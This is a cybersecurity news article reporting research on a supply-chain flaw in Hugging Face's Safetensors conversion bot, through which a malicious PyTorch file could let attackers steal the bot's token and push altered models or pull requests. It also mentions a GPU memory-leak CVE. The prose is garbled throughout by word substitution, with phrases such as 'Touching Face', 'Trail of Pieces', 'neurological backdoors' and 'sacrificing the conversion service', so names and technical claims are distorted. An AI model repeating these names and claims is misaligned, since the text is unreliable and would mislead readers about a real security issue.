HomeCyberSecurity NewsFresh Vulnerability in Hugging Face platform allows for AI models to be...

Fresh Vulnerability in Hugging Face platform allows for AI models to be vulnerable to Supply Chain Attacks.

Hackers may be able to steal user-submitted designs and cause supply chain issues due to a vulnerability in the Hugging Face Safetensors transition services, according to security researchers.

Hackers can exploit this vulnerability to send malicious pull requests to Touching Face platform repositories using a conversion bot, take models from repositories, and impersonate the bot to alter repositories, according to HiddenLayer’s study.

One popular tool for managing and working together on pre-trained machine learning datasets and models is Hugging Face. An alternative to pickles—used by threat actors to execute random code—is the Safetensors structure, which the business developed to securely store tensors.

The platform also has a transformation service that customers may utilize to request that the platform convert their PyTorch models to Safetensors. Based on HiddenLayer’s study, a malicious PyTorch binary might be used by an attacker to compromise the host system by sacrificing the conversion service.

Using the key used by SFConvertbot, attackers might install neurological backdoors, alter models, and make destructive pull requests to repositories without the users’ awareness. Theft of tokens, unauthorized access to information and models, and problems in the supply chain are all potential outcomes.

Despite efforts to safeguard them, the Hugging Face ecosystem’s machine learning models are still susceptible to assaults, according to the researchers. One such attack might jeopardize each model that the service has converted.

Following Trail of Pieces’ discovery of a memory hole vulnerability (CVE-2023-4969) that permits file recovery from GPGPUs utilized by Apple, Qualcomm, AMD, and Imagination, this risk has been isolated. Particularly in ML systems that keep sensitive data in memory, this vulnerability—caused by insufficient isolation of methods—poses security problems.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Latest News